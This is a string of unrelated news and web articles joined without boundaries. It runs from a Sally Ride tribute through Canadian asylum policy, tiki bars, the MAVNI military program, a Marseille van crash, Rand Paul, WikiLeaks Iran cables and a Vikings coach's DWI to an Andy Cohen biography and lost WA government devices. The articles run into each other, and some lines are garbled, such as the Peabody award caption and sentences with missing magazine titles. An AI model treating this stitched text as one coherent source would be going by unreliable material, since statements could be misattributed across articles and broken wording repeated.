An inevitable part of ageing is watching time claim your heroes one by one as the years go by . This week , the world lost Dr Sally Ride all too early . She was only 61.On 18 June 1983 , Ride became the first American woman in space when she flew as a mission specialist on space shuttle 's second flight , STS-7 . This mission also made her—at the age of 32—the youngest American to fly into space , a record that stands to this day.The copy of this portrait in my collection is a standard NASA lithograph , 8″ × 10″ , serial HqL-135 and dated 1983 . However , the picture was taken at the time of Ride 's selection into the astronaut program in 1978 . She was one of six women out of the thirty-five people in this group . They were the first new astronauts recruited into the space program since the Apollo era and called themselves “ TFNG ” , publicly “ thirty-five new guys ” , but also familiar military slang for “ the fucking new guy ” in an astronaut corps that was still dominated by military test pilots.Perhaps nothing speaks more painfully eloquently of the cultural importance of American women becoming astronauts than some of the questions put to Dr Ride at a press conference shortly before STS-7.Some of these questions were documented by Michael Ryan , who wrote a feature on Ride forat the time ( “ A Ride in Space ” , 20 June 1983 , pp.82–88 ) . Ride was also pictured on the cover : As recorded by Ryan , these questions included : Ride refused to answer this kind of crap , retorting instead , “ How come nobody ever asks Rick those questions ? ” ( Rick Hauk , the former US Navy fighter pilot and test pilot who was assigned to flyon their mission ) . My favourite of her responses was : Note that even the editor responsible for the magazine cover called these questions “ dumb ” and “ chauvinist ” . Awareness was certainly growing.Elsewhere in thearticle , Ride 's mother , Joyce , recalled that Johnny Carson had joked on-air that the the launch was being postponed until Sally Ride could find a purse to match her shoes.This , of someone with a PhD in astrophysics and whose selection into the astronaut corps confirmed her place as one of the best , brightest , and most capable people of her generation.Thirty years and a generational change later , it might be a little less likely that a woman would be treated this way today , but unfortunately , such attitudes are not confined to the history books just yet.Following her death , it has emerged that Ride spent the last twenty-seven years of her life in a same-sex relationship . Her partner of all those years , Dr Tam O'Shaughnessy , will not be entitled to all the benefits to which she would be entitled if theirs had been a heterosexual relationship , as explained on this NASA table : Benefits Available to Same-sex Domestic Partners . I think this is profoundly sad and unjust . To me it seems that Ride 's words apply equally : when “ this ” is the sex of one 's partner.People Weekly
Everybody stays calm , everything 's under control .
As Canadian Forces teams were busy building a tent village last week to accommodate a surge of mostly Haitian asylum claimants crossing the border from upstate New York into Quebec near Saint-Bernard-de-Lacolle , that 's what we were still being told by Prime Minister Justin Trudeau , Immigration Minister Ahmed Hussen and Quebec Premier Premier Philippe Couillard . Relax . We can handle it .
Of course we can handle it . Even if each of the 60,000 Haitians in the United States who are currently counting down the days to their deportation orders decides to head north and walk across the porous Canadian border into Quebec , we would be able to handle it . Canada 's shambolic immigration and refugee system , with all its false boasts of orderly righteousness and its make-believe coherence , will continue to trundle along in its mostly unintelligible , sometimes brazenly corrupt and ordinarily nonsensical fashion .
So yes , stay calm . The Quebec asylum-seeker surge is not yet even close to a crisis . It 's just a fiasco . It 's business as usual . And everything is definitely not under control .
The northbound Haitians are not mysteriously unaware that two years ago , Canada ended the same temporary status that the United States offered Haitians following their country 's devastating 2010 earthquake—a status the Trump administration is now determined to replace with deportation orders by January . Neither are all those Haitians arriving in droves on the Quebec border weirdly possessed of the notion that they will all qualify for refugee status in Canada . They wo n't . Earthquakes do n't count , and the Haitian government insists that the emergency is passed .
We should all stop kidding ourselves , and Trudeau , Hussen , Couillard and the rest should stop trying to kid us .
The system that 's supposed to regulate asylum claims at Canada 's entry ports is broken . The 2004 Safe Third Country Agreement was supposed to prevent cross-border “ asylum shopping. ” It was intended to discourage asylum-seekers in the United States from trying their luck in Canada and vice-versa , but because unofficial border crossings were n't taken into account , the agreement has ended up working as a border-hopping incentive .
Immigration lawyers and politicians from former Conservative immigration minister Chris Alexander to Parti Quebecois leader Jean-François Lisée say the agreement should be suspended . That might stop would-be asylum claimants from jumping the border as a first option . But if they 're determined to try their luck in Canada and they 're turned back at official ports of entry , why would n't they just try sneaking in again ?
An internal government analysis obtained by the Canadian Press in June reckons that if the rate of asylum claimants showing up in Canada continues to climb , it will take 11 years for the Immigration Review Board to adjudicate a claim filed this year . That 's de facto citizenship—or at least it should be . If the rate levels off and ends up at only 28,000 claims for all of 2017 , it would still take at least four years before a claimant this year gets a hearing . Hussen 's announcement that he 's adding a few extra staff to “ process ” applications wo n't change that .
Between January and April this year , the RCMP intercepted at least 2,700 people entering Canada from the United States at irregular border crossings from British Columbia to the Maritimes . By July 1 , that figure had jumped to 4,345 . But by then , the claims processed by the Canadian Border Security Agency and the “ inland ” offices of Immigration , Refugees and Citizenship Canada had reached 18,305 . And then last month , the traffic in asylum-claimants crossing the border into Quebec took a sharp turn upwards , from 245 claimants intercepted by the Mounties near Saint-Bernard-de-Lacolle in January to nearly 1,200 in July .
By the first week of August , it was up to 150 a day . By the end of last week , it was approaching 300 a day . At this rate , asylum claims will easily surpass 28,000 this year , and that 's without taking into account what will happen when the clock eventually runs out on another 300,000 temporary U.S. permit-holders from a dozen other countries , including El Salvador , Nicaragua , South Sudan and Yemen .
If past practice is anything to go by , Canada 's citizenship , immigration and refugee bureaucracy will be given temporary resources and time-limited marching orders and there may even be the unveiling of some new program , but we 'll end up stuck with the same fiasco by another name or in another guise . It 's just the way Canada deals with these things .
Bending to an outpouring of popular outrage , Canada quite properly welcomed close to 40,000 Syrian refugees by last Christmas , but then quietly slammed the door on further private sponsorships , leaving 25,000 Syrian refugees in a private resettlement application backlog in 2017 .
As for Quebec , it takes quite a bit of gall for Couillard to hector anyone about matters of principle on the immigration file .
By the time the former Conservative government shut down the scandalous cash-for-citizenship Immigrant Investor Program in 2014 , so much Chinese money had been sunk into Metro Vancouver real estate that Demographia International ranked Vancouver second to last out of 378 cities on its Housing Affordability Survey . Citizenship and Immigration data showed that refugees had reported higher earnings and contributed more in tax revenue to the federal treasury than all those immigrant investors , over the life of the program .
Seeing the lucrative returns involved , Quebec ramped up its own annual immigrant-investor racket to supplant the federal program , so now we 're back to square one . By last year , roughly 5,000 mostly Chinese multimillionaires each lent the Quebec government $ 800,000 interest-free over five years for the privilege of getting back on a plane , flying to Vancouver , and pouring more money into real estate . Peter Routledge , formerly of National Bank Financial and now an adviser to the federal finance department , reckons that in 2015 alone , $ 13 billion in Chinese money was sunk into Vancouver 's hopelessly overheated real estate market .
Now , Ottawa is getting back in on the action , doling out roughly 800,000 10-year , multiple-entry visas to the Chinese business class over the past two years . Bonus to big-money players : unlike the pathway-to-citizenship rules that govern permanent resident status , multiple-entry visa holders do n't have to meet residency requirements or declare their foreign assets to the Canada Revenue Agency .
Then there was the similarly scandal-wracked Temporary Foreign Workers Program , which was so disfigured by the abuse and exploitation of migrant workers that it had started to operate like a federally-regulated human trafficking operation . The program was scaled back and radically restructured three years ago , and only 90,000 migrant workers were employed via the program in2015 . But the more benign-sounding International Mobility Program is picking up where the TFW left off . The number of IMP guest workers has skyrocketed from fewer than 100,000 to 260,000 in 2015 .
So yes , do please refrain from setting your hair on fire about a few thousand Haitians who may or may not end up with temporary or permanent status or even citizenship . But do n't kid yourself . Canada 's immigration , citizenship and refugee incoherence is not going to be fixed with a few army tents on the border near Saint-Bernard-de-Lacolle .
RELATED :
In 1933 , inspired by a vacation to the South Pacific , Ernest Raymond Beaumont Gantt ( aka Don the Beachcomber ) opened an eponymous bar just off Hollywood Boulevard . Decked out in bamboo and serving colorful , potent cocktails like mai tais and Singapore slings , the original Don the Beachcomber—along with its San Francisco counterpart , Trader Vic's—started a craze that spread across a post-Prohibition country eager to make drinking fun again . By the '70s , though , the tiki trend had mostly gone from kitschy to tacky . The already fruit-forward drinks were , more often than not , made with canned juices and sugary mixes , and the faux-Polynesian aesthetic came off as phony to the era 's flower children .
But now tiki is back . “ It 's the logical next genre of cocktail history that deserves to be explored and expanded on , ” says Josh Goldman , former co-owner of the recently shuttered Brilliantshine in Santa Monica . Before it closed ( the owners are currently looking to relocate ) his was one of a new wave of bars that are working to revive the city 's tiki pedigree in the same way that bars across America were resurrecting prewar classics like the Sazerac ten years ago . You 'll find weekly tiki nights at bars from Hollywood 's upscale La Descarga to Highland Park 's rehabbed dive , Sonny 's Hideaway . In February Roy Choi Hawaii-fied his restaurant A-Frame and added a list of elevated tiki-style refreshments .
Photographs courtesy facebook.com/AFrameLA
“ The integration of tiki into today 's craft cocktail scene means you see drinks based on everything from Amaro to Chartreuse to Campari , ” says Matthew Robold , cocktail blogger and bartender at Santa Monica 's 320 Main , which holds regular tiki throwdowns . Modern tiki concoctions include drinks like the Spare Room 's Bikini Kill , made with coconut oil-washed vodka and Campari , or A-Frame 's Hibiscus Habit , spiked with gin and mescal . As for ingredient quality , do n't expect canned pineapple juice or Malibu rum . “ Contemporary customers have expectations when it comes to a well-crafted cocktail , ” says Elana Lepkowski , who cohosts L.A. 's tiki-themed pop-up , the Coconut Club . “ If you serve bottled sweet-and-sour mix , you 'll probably be met with disdain . ”
The ambience has matured as well . Today you 're more likely to be sipping an artisanal Bahama Mama at a copper bar beneath Edison bulbs than in a rattan chair near a talking parrot . Should the latter appeal to you , a handful of landmarks like the Tiki-Ti in Los Feliz and North Hollywood 's the Tonga Hut remain , where you can drift away in the original fantasy of Don , Vic , and a generation of Americans looking for an exotic escape in a glass .
Editor\ 's Note : CNN national security analyst John Kirby is a retired rear admiral in the US Navy who was a spokesman for both the State and Defense departments in the Obama administration . The views expressed in this commentary are his own .
Facing lawsuits and questions over adequate security vetting , the Pentagon is considering the cancellation of a program designed to fast-track citizenship for certain foreigners with special skills .
`` The Department of Defense is reviewing the Military Accessions Vital to the National Interest ( MAVNI ) pilot program due to potential security risks associated with the program , '' Pentagon spokesman Johnny Michael said in an email . `` Due to pending litigation , we are unable to provide any additional information at this time . ''
But MAVNI has been a great success , and it should continue .
Begun in 2009 , the program allows visa holders , asylum seekers and refugees to bypass the green card process if they possess unique , in-demand skills otherwise in short supply .
According to retired Lt . Colonel Margaret Stock , the program 's founder , more than 10,000 people have been recruited under the program . They serve all over the world and have contributed to operations in Iraq , Afghanistan and Asia-Pacific hotspots . And their number includes a US Olympic silver medalist , a Secret Service officer , a nuclear energy fellow at MIT and the US Army 's 2012 Soldier of the Year .
Some are medical specialists : thoracic surgeons , prosthodontists , orthopedic surgeons , and entomologists , to name a few .
Some speak critical languages , such as Mandarin Chinese , Russian , Arabic , Somali and Pashto , which remain vital to our ability to operate effectively around the world .
Should the military cancel MAVNI , it would deprive itself of this talent .
Moreover , according to reporting in the Washington Post , it could leave as many as 1,800 applicants out in the cold and subject to deportation .
Sen. Mark Warner of Virginia last week implored Defense Secretary James Mattis not to cancel the program and threatened a legislative backlash .
`` Military recruits in the MAVNI program should not have to wonder whether the United States will honor the contract they signed , '' he wrote in a letter to Mattis . `` If we fail to uphold the contracts we have made with MAVNI applicants , this will not only have a significantly deleterious effect on recruiting , it will also be met with a strong , swift Congressional reaction . ''
To be sure , Pentagon concerns over security are valid . The continued threat posed by ever-elusive and self-radicalized terrorists must be taken seriously . And if military leaders feel the MAVNI vetting process as currently conducted does not adequately address that or other risks , they are perfectly within their rights -- indeed , it is their responsibility -- to ensure it does so .
That said , the vetting process for MAVNI recruits was already stringent . Lt. Col. Stock tells me that before entering the United States and shipping out to boot camp , each applicant undergoes extensive screening by multiple federal agencies , to include the State Department , Department of Defense and the Department of Homeland Security . And there are , in some cases , additional vetting turnstiles through which these individuals must pass as they progress through advanced and more specialized training .
Then there is the issue of how the Army , in particular , is employing MAVNI recruits . According to NPR 's reporting , some are not being assigned to jobs that utilize the special skills for which they were recruited .
All of these are good reasons to review the health of the program . There is nothing wrong with making sure it is managed properly . But the answer should n't be to cancel it , regardless of the administrative burden .
We 're not only a nation of immigrants . We 're an Army , a Navy , an Air Force , a Marine Corps and a Coast Guard of immigrants . And we are better for it .
My military career was spent in the company of men and women from all over this country and many other countries . Their diverse backgrounds , cultures , experiences and talent made the unit stronger , more pliable . They made us better .
I 'll give you an example -- Christmas , 2006 , in Fallujah , Iraq . I was there with Admiral Mike Mullen , my boss at the time and the Navy 's top officer .
It was a morale trip , a chance for the admiral to visit with and thank sailors and Marines for their service , especially over the holidays .
   JUST WATCHED Phone booths tell the story of immigration  Replay More Videos ... MUST WATCH Related Video : Phone booths tell the story of immigration 01:32
Mullen was particularly interested in visiting the field hospital , where he could check in on some of our wounded troops and express his gratitude for the skill and dedication of military doctors , nurses and caregivers .
It was busy when we arrived . There had just been a firefight nearby , and the doctors were trying desperately to save the life of an Iraqi insurgent who had been seriously wounded by our Marines .
We stayed out of the way , of course -- indeed , we almost turned and left . It would n't do to distract them at a time like this . But in a very short time , the crisis had passed . The enemy fighter was out of danger , his life spared by American medical professionals .
One of those professionals was an immigrant from Pakistan , Dr. Saleem Khan . Khan emerged from the operating room weary , but satisfied . One of his sneakers squished when he walked , so drenched it was with blood . His shoulders slumped a little , but he was smiling ever so slightly .
He 'd done his job .
Khan was on his fifth -- yes , fifth -- tour in Iraq at that point . He volunteered for each of them . He would go on to complete another three combat deployments , including one to Afghanistan , and would be awarded the Bronze Star and the Legion of Merit for his battlefield performance .
I 'll never forget what he told me that day : `` I do n't want anyone to ever say that , as an immigrant , I did not pay my dues . ''
Follow CNN Opinion Join us on Twitter and Facebook
Every time I think about Khan , I feel small -- insignificant , really . I was born here , and I did n't do half as much as he did to repay the country we both love .
To be sure , Khan raised his right hand and became a sailor long before the MAVNI program started . He enlisted back in 1987 . But in a sense , that program was inspired by people just like him : foreign-born patriots possessing the sort of unique and vital skills we need to defend this great country .
I caught up with Khan this week . He told me Pentagon leaders should think carefully before canceling MAVNI .
`` I think it 's a wonderful program , '' he said . `` These are people who need to serve , to have a sense of belonging , a sense of comradeship , to have a sense of a stake in this country . And the military needs their skills . So it 's a win-win for everybody . ''
He 's right .
Security concerns -- whatever they may be -- are always important to address . Military leaders have a fundamental responsibility to make sure the people who take the oath are fully committed to honoring it and that those individuals have suitable assignments and career paths available to them .
But it would be self-defeating to freeze out from the ranks individuals who , like Khan , can render unique service to our military and who desperately want to `` pay their dues '' to a nation they desperately want to call home .
MARSEILLE , France ( Reuters ) - At least one person was killed and another injured in Marseille on Monday when a van crashed into two bus shelters in different parts of the French city , police said , in an incident not being treated as terrorism at this stage .
Police advised the public to avoid the Old Port area where the driver , a 35-year-old man , was arrested .
A source close to the investigation told Reuters the suspect was known to police for minor crimes and had psychological issues . France 's counter-terrorism prosecutor said it had not taken up the case at this stage .
“ The arrest was made in a surprisingly calm fashion , no gunshots were exchanged , ” David Reverdy , of the Alliance police union in Marseille , told BFM TV .
The driver first hit a bus shelter around 8:15 a.m. ( 0615 GMT ) in the poorer northern part of the city , before ramming into a second one an hour later , several kilometers ( miles ) to the south .
“ The distance traveled by the driver suggests a certain determination , ” Reverdy said .
Related Coverage Man who rammed car into bus shelters has mental issues : French police source
“ But we can ask ourselves : why these places ? If one wanted to cause carnage , other places in Marseille , at another time of day , would have been more logical , ” he said .
The incident comes as Spanish police hunt for a 22-year-old suspect they believe was behind the wheel of a van that plowed through crowds in Barcelona on Thursday , killing 13 .
France has been under a state of emergency since Islamist militants killed 130 people in and around Paris in November 2015 . Another 86 people were killed in an attack in Nice in July last year , when a Tunisian man drove a truck along the seafront boulevard , mowing down Bastille Day revelers .
Nobody puts Rand Paul in a corner — or at least , not in an undercard debate . The Kentucky senator suggested he will boycott next month 's Fox Business Network debate unless he is upgraded to the main stage .
“ I wo n't participate in any kind of second-tier debate , ” Paul said on Kilmeade and Friends — as picked up by Buzzfeed — when asked about the recently released criteria , which suggests that Paul will not qualify for the top-tier debate .
“ We 've got a first-tier campaign . I 've got 800 precinct chairman in Iowa . I 've got a 100 people on the ground working for me . I 've raised 25 million dollars . I 'm not gon na let any network or anybody tells me we 're not a first-tier campaign , ” Paul continued . “ If you tell a campaign with three weeks to go that they 're in the second-tier , you destroy the campaign . This is n't the job of the media to pick who wins . The voters ought to get a chance . ”
Tuesday evening , Fox Business Network announced its criteria for the main stage : a candidate must place in the top six in the average of the last five national polls ; the top five in the average of the last five New Hampshire polls ; or the top five in the average of the last five Iowa polls . According to Politico 's calculations , Paul is not likely to be invited to the later debate under those standards .
CNN was accused of changing its criteria to allow Paul to participate in this month 's main stage debate .
Paul said the current set-up would “ lay it up in a lap ” for Donald Trump , as he is “ the only one on the state that will challenge him . ”
He added that it was a “ real mistake for the media to be given so much power to select who has a chance and who does n't have a chance ” and that “ the polls have been wildly inaccurate . ”
“ I frankly just wo n't be told by the media which tier I 'm in , and we 're not willing to accept that , because we 're a first-tier campaign and we 're in it to win it and we wo n't be told that we 're in a tier that ca n't win , ” he said . He suggested that fundraising and the organizational strength should also be considered in choosing who participates in which debates .
“ We just ca n't accept the designation of being artificially told that we do n't have a chance with three weeks to go , so we wo n't stand for it , and we will protest any such designation , ” he said .
The Fox Business Network debate is scheduled for January 14 .
The United States believes Iran has obtained advanced missiles from North Korea that could reach Moscow and cities across Western Europe , one of several secret diplomatic assessments of Iran 's weapons program disclosed publicly for the first time Sunday .
The treasure trove of secret State Department cables obtained by WikiLeaks and reported Sunday by several news organizations chronicle the Iranian nuclear standoff from its genesis . The diplomatic memos disclose the extent to which many of the United States 's allies in the Arab world repeatedly implored Washington to stop Iran 's pursuit of nuclear weapons .
In one such plea , King Abdullah of Saudi Arabia reportedly urged U.S. officials in 2008 to `` cut off the head of the snake '' while there was still time .
In another , in May 2009 , Israel 's defense minister , Ehud Barak , argued that the world had six to 18 months `` in which stopping Iran from acquiring nuclear weapons might still be viable . '' According to a secret cable that the U.S. ambassador to Israel , James B. Cunningham , sent to Washington , Barak said : `` Any military solution would result in unacceptable collateral damage . ''
In November 2009 , Bahrain 's King Hamad argued forcefully for taking action to terminate Iran 's nuclear program , by whatever means necessary , according to one diplomatic cable .
`` The program must be stopped , '' Hamad said in a meeting with Gen. David H. Petraeus , then head of the U.S. Central Command . `` The danger of letting it go on is greater than the danger of stopping it . ''
The accounts are based on a report published Sunday afternoon by the New York Times , one of five American and European news organizations granted advance access to the cables by WikiLeaks .
According to the accounts , the United States believes that North Korea is helping Iran achieve its atomic ambitions by helping the country develop more-formidable long-range ballistic missiles .
At the same time , the cables reportedly show how Israel , the Saudis and U.S. allies in the region have grown more unified in their desire to halt Iran 's ascent . While those countries have been publicly cautious , for fear of retributions from their powerful neighbor , they privately clamored for strong steps by the United States , using diplomacy , covert action or force , according to the New York Times .
The cables show officials from Persian Gulf states unable to decide which would be worse : a strike against Iran and the resulting turmoil it would cause in the region , or inaction and having to live with a nuclear-capable Iran .
The cables reveal the deep distrust of Iran 's president , Mahmoud Ahmadinejad , shared by U.S. diplomats and officials from America 's Arab allies . In 2005 , military leaders from the United Arab Emirates said during a meeting with the head of the U.S. Central Command , Gen. John P. Abizaid , that Ahmadinejad `` seemed unbalanced , crazy even , '' according to one cable documented by the New York Times .
A few months later , the Emirates ' defense chief , Crown Prince Mohammed bin Zayed of Abu Dhabi , told Abizaid that he believed the United States needed to take action against Iran `` this year or next . ''
Yet the cables also appear to show the disparate attempts of Washington to confront Tehran . President Bush , focused on ongoing wars in Iraq and Afghanistan , struggled to put together even modest sanctions against Iran , according to the Times ' report .
Meanwhile , President Obama was determined to not appear weak to the Iranians despite his promise of `` engagement . '' The cables reportedly show how Obama 's advisers rolled out a plan to encircle Iran with economic sanctions and antimissile defenses . Although the Obama administration expected this outreach to fail , it believed the effort would help build support for tougher measures .
And as the government obtained new intelligence about Iran 's growing missile program , the Obama administration maneuvered to win Russian support for sanctions . It replaced a Bush-era plan for a missile defense site in Poland with one closer to Iran 's coast . The cables also apparently reveal a successful U.S. plan to get the Saudis to offer China an increased supply of oil to wean it from energy dependence on Iran , which resulted in a commitment from China to join in sanctions against Iran .
The cables show that the Obama administration is doubtful that a military strike would keep Iran from obtaining a nuclear bomb in the future . One cable earlier this year revealed that Defense Secretary Robert M. Gates delivered a stark assessment to Herve Morin , the French defense minister . Any strike against Iran , Gates apparently said , `` would only delay Iranian plans by one to three years , while unifying the Iranian people to be forever embittered against the attacker . ''
Vikings defensive coordinator George Edwards was arrested on suspicion of drunken driving in May and pleaded guilty in August to a misdemeanor charge of careless driving , court records show .
The Pioneer Press learned of the arrest Tuesday . In a statement , the Vikings said Edwards notified the team immediately of his arrest and that “ he was significantly disciplined by the Vikings . ”
The Vikings did not say what punishment Edwards incurred . In a statement released to the Pioneer Press , NFL spokesman Brian McCarthy said , “ The team made us aware of the incident and the discipline it imposed as a result . ”
Tuesday is the team 's usual day off , but the Vikings did release offensive lineman Isame Faciane from the practice squad , less than a week after he was arrested on suspicion of drunken driving in St. Louis Park .
On Monday , head coach Mike Zimmer called Faciane 's arrest “ stupid , ” adding “ that 's one of the things that I 'm trying to get rid of around here . ”
Before Faciane was arrested last Wednesday , the last Vikings player known to have been arrested was cornerback Jabari Price on Dec. 29 , 2014 . Arrested on suspicion of drunken driving , Price pleaded guilty to careless driving and received a two-game suspension from the NFL to start the 2015 season . Related Articles Vikings release Isame Faciane , re-sign Tre Roberson to practice squad
Forget 5-0 . Mike Zimmer says the Vikings are 0-0
Brian Murphy : Cautious Vikings have favorable path to NFC crown
Edwards , in his third season with the Vikings , is coordinator of a unit that ranks first in the NFL in scoring defense and second in total defense . Minnesota is 5-0 going into Sunday 's game at Philadelphia .
Edwards , 49 , was charged May 21 with 4th degree DWI and operating a motor vehicle under the influence of alcohol after being pulled over in Chanhassen at 11:46 p.m . According to the police report , Edwards blew a blood-alcohol level of .11 at the time of his arrest — .03 over the legal limit of .08 — and tested at .10 at 1:04 a.m. on May 22 at the Carver County Jail .
According to police , Edwards was observed failing to use a turn signal . Police followed him and pulled him over in a Taco Bell parking lot after police said he failed to signal a turn for a fourth straight time .
According to Hennepin County Court records , Edwards pleaded guilty on Aug. 30 to a misdemeanor charge of careless driving , paid a $ 1,000 fine and was placed on one year of probation through Aug. 30 , 2017 .
Records show , as terms of his sentence , he has completed a chemical dependency evaluation/treatment and attended a Mother Against Drunk Driving Impact Panel , along with some other requirements .
Edwards ' lawyer David Valentini declined comment Tuesday . The Vikings , in their statement to the Pioneer Press , said they consider the matter closed .
“ George Edwards immediately notified the team of this situation when it occurred , ” the statement read in full . “ He was significantly disciplined by the Vikings . George has fulfilled both his legal obligations and the additional team-imposed discipline . ”
Faciane was charged last week with 4th degree DWI and driving without a Minnesota driver 's license . He was not at practice on Monday , when Zimmer was asked about his arrest .
“ My thoughts are that it 's disappointing , and that 's one of the things I 'm trying to get rid of around here , making sure that our fans are being represented in the right way , ” said Zimmer , in his third season as Vikings coach . “ It was stupid , and we 'll see . ”
For other people named Andrew Cohen , see Andrew Cohen ( disambiguation )
Andrew Joseph Cohen ( born June 2 , 1968 ) [ 1 ] is an American radio and television talk show host , producer and writer . He is the host and executive producer of the Bravo 's late night talk show , Watch What Happens Live with Andy Cohen . [ 2 ] [ 3 ] Cohen also has a pop culture channel on SiriusXM Radio named Radio Andy . [ 4 ] He hosts a two-hour live show with co-host John Hill twice a week . [ 5 ] Cohen served as Bravo 's Executive Vice President of Development and Talent until 2013 . [ 6 ] He was responsible for creating original content , developing innovative formats and identifying new talent . Cohen also served as Executive Producer on Emmy and James Beard award–winning reality cooking competition television show , Top Chef . [ 3 ] He continues to serve as an executive producer of the Real Housewives franchise , host of Watch What Happens Live on Bravo , [ 7 ] host of Andy Cohen Live [ 8 ] on SiriusXM channel 102 , and host of the television dating show , Love Connection . [ 9 ]
Early life [ edit ]
Cohen was born in St. Louis , Missouri to Evelyn and Lou Cohen . [ 10 ] He is Jewish . [ 11 ] [ 12 ] Cohen graduated from Clayton High School in 1986 . [ 13 ] As a child , he attended Camp Nebagamon for Boys in Lake Nebagamon , Wisconsin . [ 14 ] He is a graduate of Boston University , where he received a Bachelor of Science degree in broadcast journalism . [ 15 ] Cohen wrote for the Boston University student newspaper , The Daily Free Press . [ 16 ] He later interned at CBS News alongside Julie Chen , [ 17 ] [ 18 ] who was also working as an intern . [ 19 ]
Career [ edit ]
Cohen began his career in television as an intern at CBS News . [ 20 ] He spent 10 years at the network , eventually serving as senior producer of The Early Show , a producer for 48 Hours and CBS This Morning , [ 21 ] He joined the television network Trio in 2000 , [ 22 ] later becoming vice president of original programming at Bravo in 2004 [ 23 ] when the network purchased Trio . [ 24 ]
Cohen was a regular on Today and Morning Joe and has co-hosted Live ! with Kelly , and The View . He has made various guest appearances on other talk shows . He has made several guest appearances on television shows playing himself , such as The Comeback and Saturday Night Live . [ 25 ] In summer 2009 , Cohen began hosting a weekly midnight television talk show , Watch What Happens Live . [ 26 ] The show was later expanded into a weeknight series . [ 27 ] Cohen is currently in contract with Bravo to host Watch What Happens Live with Andy Cohen until 2020 . [ 28 ]
Cohen 's autobiographical memoir Most Talkative ( Henry Holt and Company ) , released in May 2012 , [ 10 ] [ 29 ] became a New York Times Best Seller in the hardcover , paperback , and combined nonfiction categories . [ 30 ] [ 31 ] [ 32 ]
On August 15 , 2013 , he declined to co-host the Miss Universe pageant in Russia , due to the country 's recent adoption of anti-gay laws . [ 33 ] Before that , he hosted Miss USA 2011 , Miss USA 2012 , Miss USA 2013 , Miss Universe 2011 , and Miss Universe 2012 . [ citation needed ] On March 22 , 2014 , he portrayed Zeus in Lady Gaga 's music video for `` G.U.Y. '' . [ 34 ]
In November 2014 , Cohen published his second memoir , The Andy Cohen Diaries : A Deep Look at a Shallow Year , [ 35 ] inspired by the similarly titled The Andy Warhol Diaries . The book spans a year long of journal entries beginning in September 2013 . [ 36 ] The Andy Cohen Diaries became a Times Best Seller in the Combined Print & E-Book Nonfiction category . [ 37 ]
On September 14 , 2015 , SiriusXM launched a new radio channel curated by Cohen , known as Radio Andy [ 38 ] on channel 102 . The channel features shows hosted by Cohen ( Andy Cohen Live , and Andy Cohen 's Deep & Shallow ) . Cohen also hosts a series of special broadcasts for his station known as Town Halls in front of a live studio audience . [ 39 ] [ 40 ] The channel also features shows hosted by ; Sandra Bernhard , Bevy Smith , Dan Rather , Jim Parsons , Jeff Lewis , Amy Phillips , Jonathan Alter ( together with his family ) , John Hill , the producers of Watch What Happens Live , and the producers at World of Wonder . The channel has also produced specials including ; Radio Andy Theater , a parody of the Real Housewives franchise , [ 41 ] AC2 Live : Andy and Anderson on the Road ( a behind-the-scenes show following Cohen and Anderson Cooper on their live tour ) , and the Love Connection Diaries ( also a backstage docu-series featuring Cohen , and Love Connection producer and Radio Andy host , John Hill ) .
Cohen and Anderson Cooper announced that they would be going on a national tour to perform their conversational stage show AC2 beginning in March 2015 . [ 42 ] [ 43 ] The tour opened in Boston , followed by Miami Beach , Chicago and Atlanta . [ 43 ] The idea for the show came about after Cooper interviewed Cohen about his then-latest book , The Andy Cohen Diaries , at an event at the 92nd Street Y in New York City . [ 44 ] [ 45 ] Since then , the two-man show has continued to tour reaching over 50 cities as of October 2018 . [ 46 ]
On December 31 , 2015 , Cohen hosted a one-off live edition of Hollywood Game Night ( New Year 's Eve Game Night ) , and co-hosted New Year 's Eve with Carson Daly , for NBC . [ 47 ]
In 2016 , the publisher Henry Holt and Company announced it was launching the imprint Andy Cohen Books . [ 48 ] Cohen 's third memoir Superficial : More Adventures From the Andy Cohen Diaries was published in November 2016 . [ 49 ] A sequel to The Andy Cohen Diaries , [ 50 ] the book covers diary entries for the subsequent two years . [ 51 ] Superficial became a Times Best Seller among books written by celebrities . [ 52 ]
In January 2017 , Fox ordered a revival of Love Connection hosted by Cohen . [ 53 ] The hour-long game show premiered on May 25 . [ 54 ] The same month , Cohen played himself on the Netflix series , Unbreakable Kimmy Schmidt . [ 55 ] In August 2017 , Fox announced that it would renew Love Connection for a second season . [ 56 ] Later that year , Cohen succeeded Kathy Griffin as co-host of CNN 's New Year 's Eve coverage alongside Cooper . [ 57 ] [ 58 ]
In 2018 , Cohen played himself on the show Riverdale as a friend of the Lodge family . [ 59 ] He made a March 2018 appearance as a guest judge in an episode of the VH1 reality-television series RuPaul 's Drag Race . [ 60 ] In December 2018 , he again co-hosted CNN 's New Year 's Eve coverage with Anderson Cooper . [ 61 ]
Personal life [ edit ]
Cohen is the first openly gay host of an American late-night talk show . [ 62 ] In December 2018 , he announced he would become a father in 2019 with the help of a surrogate . [ 63 ] On February 4 , 2019 , Cohen welcomed a son . [ 64 ]
Awards [ edit ]
The N-Word receiving an award at the 65th Annual Cohen ( left ) among the creators ofreceiving an award at the 65th Annual Peabody Awards
Filmography [ edit ]
Television [ edit ]
Bibliography [ edit ]
Most Talkative : Stories from the Front Lines of Pop Culture . Henry Holt and Company . 2012 . ISBN 978-0-8050-9583-8 .
The Andy Cohen Diaries : A Deep Look at a Shallow Year . Henry Holt and Company . 2014 . ISBN 978-1-627-79228-8 .
Superficial : More Adventures from the Andy Cohen Diaries . Henry Holt and Company . 2016 . ISBN 978-1250116482 .
See also [ edit ]
WA Government departments lose mobiles , laptops worth $ 484,000
Updated
Taxpayer-funded laptops and mobile phones valued at $ 484,000 were either stolen or lost from West Australian Government departments in the last financial year .
State Opposition Leader Mark McGowan said that was an increase of $ 40,000 on losses from the previous year .
He said more than 700 of the devices had been reported missing , including 280 laptops and 29 mobile phones valued at $ 242,900 from the Department of Education alone .
WA Police and the Health Department had losses valued at $ 61,212 and $ 34,581 respectively .
Mr McGowan said the Government had failed to address the issue , despite promising to do so at the end of the previous financial year .
`` Loss of taxpayers ' money of course is concerning , but on top of that there 's the loss of data , and some of it could be secret data from the police , so it is concerning and it 's also concerning that the Government said it would crack down on it happening in the future , and yet it 's getting worse , '' he said .
Premier Colin Barnett said he was disappointed that agencies had not addressed the issue .
In a statement , Mr Barnett said the losses represented a small proportion of the devices issued to departments but were still of significant concern .
He said he would seek the assistance of the Auditor-General on how to better address the issue .
Topics : public-sector , state-parliament , perth-6000 , wa
First posted
